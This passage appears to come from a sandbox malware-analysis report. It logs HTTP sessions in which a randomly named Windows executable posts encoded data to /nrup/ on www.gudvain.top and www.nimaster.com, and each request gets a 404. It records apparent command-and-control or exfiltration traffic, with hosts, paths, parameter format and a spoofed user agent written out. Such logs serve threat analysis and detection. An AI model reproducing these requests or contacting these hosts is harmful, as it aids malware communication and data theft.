May 3, 2024 11:33:50.375938892 CEST	533	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:49 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.22	49183	203.161.62.199	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:52.951159954 CEST	730	OUT	POST /nrup/ HTTP/1.1 Host: www.gudvain.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.gudvain.top Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.gudvain.top/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 66 67 62 6e 6b 36 4f 36 38 6e 59 58 66 72 49 62 6d 2f 70 38 71 4b 56 49 4f 7a 57 63 2f 51 31 31 75 4d 41 72 70 64 42 33 6f 43 4c 32 33 39 6b 46 73 45 44 63 65 4e 74 4f 4d 4f 50 54 74 51 6c 31 53 75 74 41 53 73 41 36 77 4f 37 37 59 62 45 52 2f 62 56 49 35 6f 48 4e 36 5a 69 6d 4c 30 59 73 6d 39 30 6c 7a 51 2b 48 2f 2b 2f 49 37 71 30 54 57 43 38 34 67 71 36 70 51 4a 38 72 2b 41 50 55 4a 55 36 2f 6f 2f 63 46 66 56 45 34 48 44 51 6b 41 74 33 33 33 71 72 52 6b 38 5a 30 50 68 42 6a 57 42 33 76 75 70 38 6f 36 31 46 2b 6b 78 45 64 2f 30 6a 6e 75 30 65 35 37 66 36 31 64 4a 4c 45 71 41 3d 3d Data Ascii: pX6dR=fgbnk6O68nYXfrIbm/p8qKVIOzWc/Q11uMArpdB3oCL239kFsEDceNtOMOPTtQl1SutASsA6wO77YbER/bVI5oHN6ZimL0Ysm90lzQ+H/+/I7q0TWC84gq6pQJ8r+APUJU6/o/cFfVE4HDQkAt333qrRk8Z0PhBjWB3vup8o61F+kxEd/0jnu0e57f61dJLEqA==
May 3, 2024 11:33:53.119637012 CEST	533	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.22	49184	203.161.62.199	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:55.758833885 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.gudvain.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.gudvain.top Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.gudvain.top/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 66 67 62 6e 6b 36 4f 36 38 6e 59 58 66 49 51 62 67 73 42 38 76 71 56 4a 42 54 57 63 32 77 31 78 75 4d 4d 72 70 63 55 6f 6f 77 48 32 33 75 73 46 73 69 33 63 53 74 74 4f 4b 4f 50 58 7a 67 6b 30 53 76 4d 7a 53 6f 49 41 77 4b 66 37 59 38 41 52 32 35 4e 50 32 34 48 44 2b 5a 69 6c 4c 30 59 31 6d 39 45 62 7a 51 4b 35 2f 2b 33 49 38 59 73 54 44 43 38 33 73 4b 36 70 51 4a 38 76 2b 41 4f 78 4a 55 53 6e 6f 36 39 64 65 6e 4d 34 48 6a 77 6b 47 38 33 30 2b 4b 72 56 36 4d 59 7a 45 7a 78 7a 50 78 6a 31 6d 34 73 4c 6b 6b 39 42 6b 79 6b 6f 2b 6b 37 39 6d 31 71 74 2b 61 7a 5a 51 70 44 4a 78 58 79 34 78 59 76 44 32 2b 78 38 4b 4d 4d 6b 4c 6f 78 47 2f 6e 4e 4e 44 70 4d 74 76 31 79 61 66 67 74 4e 2b 6a 64 56 46 37 78 76 55 6c 70 2b 4d 6a 31 43 4a 55 45 5a 2b 78 78 4c 4a 67 54 72 63 71 52 74 44 56 50 42 53 4d 49 49 6e 2f 55 4f 51 35 35 67 63 4b 34 74 59 66 46 75 61 30 4e 69 4a 31 30 46 43 35 2b 7a 43 70 77 2b 66 6e 38 75 55 44 68 78 65 2b 49 38 65 35 57 35 46 4a 6a 6c 46 56 2f 74 36 64 38 4b 4b 79 67 57 [TRUNCATED] Data Ascii: pX6dR=fgbnk6O68nYXfIQbgsB8vqVJBTWc2w1xuMMrpcUoowH23usFsi3cSttOKOPXzgk0SvMzSoIAwKf7Y8AR25NP24HD+ZilL0Y1m9EbzQK5/+3I8YsTDC83sK6pQJ8v+AOxJUSno69denM4HjwkG830+KrV6MYzEzxzPxj1m4sLkk9Bkyko+k79m1qt+azZQpDJxXy4xYvD2+x8KMMkLoxG/nNNDpMtv1yafgtN+jdVF7xvUlp+Mj1CJUEZ+xxLJgTrcqRtDVPBSMIIn/UOQ55gcK4tYfFua0NiJ10FC5+zCpw+fn8uUDhxe+I8e5W5FJjlFV/t6d8KKygWWKMFNi1B6zWaA9L5PjzYnf8gnSGu3lXvSEx5M3vHz79YyUrFlOkkKu9PxFHoyNY8tkJw99Sez9ER0LLg6jR4TnZKqgFWTQ36FWGxj2AD3BkDiXAp+CwkmzFjrD7wyzjh2fdSNeks9X4EbaMfgFJaYBQWvF1Yl4RWz0NE88DCi8Qm8DPqERmTdgPAYRYPWzcyCpb2ijvMl4f39/xK5YWg6CiUJGGEhVblkzvoMQfQmdJk5IJQGrGFt4qpOuPLNzN20NtnwGTWJXglKnFixh9Q/W3obgPTcXCm5skin01B7duursNPhi6zUG3kaZt1KRCpdVhcDXzRbpUqTQxq31BQXm2dc04DPIm5Fdfa7weA8r2bo70K2o1rGy2wibA8+fQZvdTwOSJWoDxOLJCD74z1ez54fyKUe8SEQE8driLnFQDs2IguN0WPP+XE4Z6HeTd5R/NQ4vfkMvKPCbL/UvyFZF60V8G6J5LQ3P0u5ct34F/53m71pIQRNnNLGkOypieX0SE2ZCFJFtlJ1NRZI8lUII+Wx1L4+TfU5IR5UuWUWKQRX0zTxVira4/ypIFBL8VJbWyLK6dNzPwZAnJzHPVAjh9BjqFJKjKY5/nRLeANSwsQh/bQllUGusYtqQSfcteKj0Z7AMdk6YgcWpLFH8FzNMZwUHhVS5vxFM [TRUNCATED]
May 3, 2024 11:33:55.915931940 CEST	1577	OUT	Data Raw: 47 6e 50 2b 53 52 47 75 31 6b 65 49 72 76 6f 4e 59 48 6a 54 31 55 37 4e 32 51 54 6f 72 69 57 6d 55 35 2f 75 79 6b 4b 79 4e 62 53 59 51 68 4a 39 51 52 79 46 30 4a 30 74 2b 6e 57 6a 32 65 2b 2f 62 7a 38 6f 52 45 4e 74 38 63 56 58 6b 2f 72 63 37 4b Data Ascii: GnP+SRGu1keIrvoNYHjT1U7N2QToriWmU5/uykKyNbSYQhJ9QRyF0J0t+nWj2e+/bz8oRENt8cVXk/rc7KpucxywwmS4w9p/SQ8nIV4VJD+0+vtjJZ8JZaKz/nkeHwlukIuZ1EuK3MdmzW+mOwFR3x9U4ro7av7IBQLuHPW+RIq1oryesItb6NNd6Vd5Qr8SdAHeF6CGObRYBfrppys9do6Wr7XXWaPyg/5Hx3YIdl9BHViTvVg
May 3, 2024 11:33:56.084638119 CEST	533	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:55 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.22	49185	203.161.62.199	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:58.457670927 CEST	470	OUT	GET /nrup/?pX6dR=SizHnN/9xgcqSIkR3Mp/mJItKwrd9Ch/0t0LsappuxDuweYFtCvxWsRrJ8CRzXcbZvFBcd4a+abpRcpo9JYs/p363666BVY+tJEOkjWCxOG41ow7FQErnKiMZNMn&tv=6TdD8B HTTP/1.1 Host: www.gudvain.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:33:58.627691031 CEST	548	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:58 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.22	49186	217.26.48.101	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:04.611815929 CEST	2560	OUT	POST /nrup/ HTTP/1.1 Host: www.nimaster.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.nimaster.com Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.nimaster.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 64 54 71 70 64 52 61 64 75 4e 47 44 56 65 72 36 77 4e 65 38 71 31 33 32 6d 68 6d 6d 64 6e 7a 38 69 6e 33 46 4d 59 71 6f 52 36 6c 63 66 68 45 45 2b 4f 47 64 6c 4f 33 70 79 6d 4d 32 6b 4d 48 74 4c 46 75 76 39 50 71 4f 4e 47 31 6a 72 34 4d 4b 37 75 45 57 51 30 61 42 76 58 36 65 6c 39 4c 77 75 54 70 52 35 53 69 38 2f 37 76 45 35 30 2f 59 63 61 32 67 52 79 6e 7a 68 6c 6e 63 31 56 41 4c 77 74 7a 64 54 38 48 49 4a 59 38 4e 6e 36 64 77 58 66 30 37 2b 6b 31 4f 50 78 32 56 6e 50 62 55 72 31 35 4a 6f 64 61 42 74 73 2b 68 58 39 46 6d 2b 7a 32 4a 42 67 4e 4e 78 5a 53 68 41 2b 4d 75 66 71 47 70 30 77 2f 38 49 44 54 4a 68 53 6d 77 51 51 49 79 4d 6d 77 41 4b 42 63 30 67 66 71 7a 6f 70 59 74 46 50 49 70 7a 2b 4f 38 50 45 61 71 51 73 35 53 4c 39 66 70 4f 32 48 6a 62 2b 70 45 66 2b 5a 67 58 38 73 50 34 7a 34 53 36 4e 69 41 6c 6c 63 6b 62 6a 78 74 6c 54 6a 72 66 54 39 30 50 49 37 62 38 39 6e 4f 6e 45 52 50 47 6f 6c 6d 61 37 6e 62 50 70 66 31 67 2f 30 32 71 75 64 6e 38 6e 77 62 4c 2f 73 41 38 37 6f 47 [TRUNCATED] Data Ascii: pX6dR=dTqpdRaduNGDVer6wNe8q132mhmmdnz8in3FMYqoR6lcfhEE+OGdlO3pymM2kMHtLFuv9PqONG1jr4MK7uEWQ0aBvX6el9LwuTpR5Si8/7vE50/Yca2gRynzhlnc1VALwtzdT8HIJY8Nn6dwXf07+k1OPx2VnPbUr15JodaBts+hX9Fm+z2JBgNNxZShA+MufqGp0w/8IDTJhSmwQQIyMmwAKBc0gfqzopYtFPIpz+O8PEaqQs5SL9fpO2Hjb+pEf+ZgX8sP4z4S6NiAllckbjxtlTjrfT90PI7b89nOnERPGolma7nbPpf1g/02qudn8nwbL/sA87oGQIM1TI9gVIBJbyGudqe+tAU+7cpCFHw8KNhXQCqz+dKkg+GkMLpnj41q9tknk3PqBoeeQco79YdgNZa2d2SrDWg7Y/Co8VcakBU++qSSzr5j4/6OFEImeCZVxzFyolwCxfYIKY5QOBr+KMHuYMt0rzbHotcyMYcTM2OmNzd1lAE8JjcIGZ2T1nXNCE+a0AvJQGGOizuZtzctq80g6v5st6DXueEGuMgbC+mnqhunjz5tXBfpJDFpa3EgxfhOYKOVr4sUxLHgaZl/13IuDAWQn3Dbxj3x7MrrER4UMvNFjh8XfzSg4gxcsQgzuHCagvChVGaZhR5YtoRQxIz/eH6CItyJL2YIp8YHBKZkXKXg0L0UUZ656Hrm4eV+fPoPSqwOE9QBcGoJ/blvoec8pk1jLY0dC6FnQ2jczPMK+BFbZXGWlSUoPoZaS7SToTimMLBKBzsYIDZf1MlFC3IBACBG/WP/QzrUMpcZyjmfzjUi0GDIV1Q5L889uKI7cBZTxjxVxGR+QhXQrclRCmskFz+eM6UkkYGzUKOMusOIhFJQwZL1e9+VOASMVD2QROiUWqhTAEzikIyeTr0kP5Ym+83V8F6QpkQLy9Oy5zM4oNfQ9ey7pfZnf3zP1W0GCiBA7wYfOU5t7AHj0hStYnxB/7kPr3QqxUdJBpL942 [TRUNCATED]
May 3, 2024 11:34:04.788197994 CEST	134	OUT	Data Raw: 55 65 32 69 52 7a 68 32 6c 34 36 77 30 61 4a 42 33 42 56 53 53 55 53 58 4e 6c 43 2b 4a 79 65 65 39 46 70 65 6c 39 41 67 70 53 47 35 6e 30 7a 4e 30 75 61 4c 79 76 73 5a 73 58 6b 41 4f 74 79 2f 53 44 52 51 6b 2f 76 4a 65 50 38 2b 48 5a 73 4b 6b 37 Data Ascii: Ue2iRzh2l46w0aJB3BVSSUSXNlC+Jyee9Fpel9AgpSG5n0zN0uaLyvsZsXkAOty/SDRQk/vJeP8+HZsKk7p0T0tkxMA0GlmQ8N8ozJYrs9YGwBzNYiVJTgLfiw0EPx52kakl4R
May 3, 2024 11:34:04.964194059 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:34:04 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.22	49187	217.26.48.101	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:07.305361032 CEST	733	OUT	POST /nrup/ HTTP/1.1 Host: www.nimaster.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.nimaster.com Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.nimaster.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 64 54 71 70 64 52 61 64 75 4e 47 44 56 5a 48 36 78 59 79 38 71 56 33 32 6e 68 6d 6d 54 48 7a 6c 69 6e 4b 32 4d 5a 65 34 51 4e 35 63 66 54 73 45 2b 38 2b 64 69 4f 33 32 67 47 4d 49 67 4d 47 76 4c 46 75 5a 39 4b 43 4f 4e 48 52 6a 6b 36 30 4b 35 76 45 52 53 45 61 35 36 6e 36 54 6c 39 48 54 75 55 68 42 35 53 61 38 2f 38 4c 45 34 30 50 59 59 50 71 67 55 43 6e 31 71 46 6d 63 31 56 4e 54 77 74 6a 76 54 38 4c 49 49 70 67 4e 6e 76 70 77 56 2b 30 37 33 45 31 4e 43 52 33 2f 30 65 47 59 76 47 64 32 6a 2f 71 44 6a 75 69 43 54 66 42 37 33 53 43 70 4a 69 35 4d 79 2b 4c 6a 46 63 68 64 63 67 3d 3d Data Ascii: pX6dR=dTqpdRaduNGDVZH6xYy8qV32nhmmTHzlinK2MZe4QN5cfTsE+8+diO32gGMIgMGvLFuZ9KCONHRjk60K5vERSEa56n6Tl9HTuUhB5Sa8/8LE40PYYPqgUCn1qFmc1VNTwtjvT8LIIpgNnvpwV+073E1NCR3/0eGYvGd2j/qDjuiCTfB73SCpJi5My+LjFchdcg==
May 3, 2024 11:34:07.481216908 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:34:07 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.22	49188	217.26.48.101	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:12.198388100 CEST	2560	OUT	POST /nrup/ HTTP/1.1 Host: www.nimaster.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.nimaster.com Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.nimaster.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 64 54 71 70 64 52 61 64 75 4e 47 44 58 35 58 36 33 37 71 38 39 46 33 33 37 78 6d 6d 64 6e 7a 70 69 6e 32 32 4d 59 71 6f 52 37 5a 63 66 67 6b 45 2f 65 47 64 6b 4f 33 32 78 6d 4d 32 6b 4d 48 75 4c 42 2f 71 39 50 6e 7a 4e 45 39 6a 72 35 4d 4b 37 74 73 57 59 55 61 42 77 48 36 51 6c 39 47 52 75 53 42 46 35 53 4f 53 2f 39 76 45 2f 42 37 59 63 50 71 6a 62 69 6e 31 71 46 6d 59 31 56 4d 32 77 74 37 4e 54 39 50 59 4a 62 34 4e 6e 4b 64 77 54 66 31 74 78 45 30 45 4e 42 32 66 6e 50 58 44 72 31 35 4e 6f 5a 79 76 74 73 69 68 57 76 4e 6d 2b 30 4b 47 45 41 4e 4f 2f 35 53 68 45 2b 4d 77 66 71 47 31 30 77 2f 38 49 48 54 4a 7a 79 6d 77 51 52 49 78 42 47 77 41 4a 42 63 7a 76 2f 6e 49 6f 70 4d 50 46 4f 34 44 7a 4a 57 38 49 47 43 71 58 63 35 53 43 74 65 67 4f 32 48 6b 56 65 70 32 66 34 78 43 58 38 64 43 34 7a 34 53 36 4c 75 41 67 7a 49 6b 64 7a 78 74 70 7a 6a 6d 55 7a 39 7a 50 49 2f 70 38 2b 37 4f 6e 41 5a 50 46 36 39 6d 4c 75 54 55 48 35 66 30 71 66 30 30 67 4f 64 49 38 6e 63 39 